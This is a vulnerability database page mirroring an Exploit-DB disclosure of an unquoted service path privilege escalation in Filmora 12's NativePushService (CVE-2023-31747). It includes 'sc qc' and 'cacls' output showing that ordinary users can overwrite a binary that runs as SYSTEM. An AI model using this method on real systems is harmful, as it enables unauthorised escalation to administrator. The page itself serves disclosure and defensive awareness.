Lucene search
+L

Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation

🗓️ 25 May 2023 00:00:00Reported by Thurein SoeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 420 Views

Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation - Local user can elevate to local admin by replacing affected executable

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Unquoted Search Path or Element in Wondershare Filmora
24 Apr 202316:36
githubexploit
0day.today
Filmora 12 Build 1.0.0.7 Unquoted Service Path Vulnerability
19 May 202300:00
zdt
0day.today
Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation Vulnerability
26 May 202300:00
zdt
ATTACKERKB
CVE-2023-31747
23 May 202323:15
attackerkb
Circl
CVE-2023-31747
15 Jan 202411:02
circl
CNNVD
Filmora 代码问题漏洞
20 May 202300:00
cnnvd
CVE
CVE-2023-31747
23 May 202300:00
cve
Cvelist
CVE-2023-31747
23 May 202300:00
cvelist
EUVD
EUVD-2023-36038
3 Oct 202520:07
euvd
NVD
CVE-2023-31747
23 May 202323:15
nvd
Rows per page
# Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation
# Date: 20  May 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://filmora.wondershare.com
# Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE
# Version: Filmora 12 ( Build 1.0.0.7)
# Tested on: Windows 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31747


Vulnerability description:
Filmora is a professional video editing software. Wondershare NativePush
Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare
NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The
service name "NativePushService" was vulnerable to unquoted service paths
vulnerability which led to full local privilege escalation in the affected
window operating system as the service "NativePushService" was running with
system privilege that the local user has write access to the directory
where the service is located. Effectively, the local user is able to
elevate to local admin upon successfully replacing the affected executable.


C:\sc qc NativePushService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NativePushService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   :
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
NativePush\WsNativePushService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Native Push Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
NativePush\WsNativePushService.exe"

C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
NativePush\WsNativePushService.exe

BUILTIN\Users:(ID)F

                      NT AUTHORITY\SYSTEM:(ID)F

                      BUILTIN\Administrators:(ID)F

                      HNINKAYTHAYAR\HninKayThayar:(ID)F

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation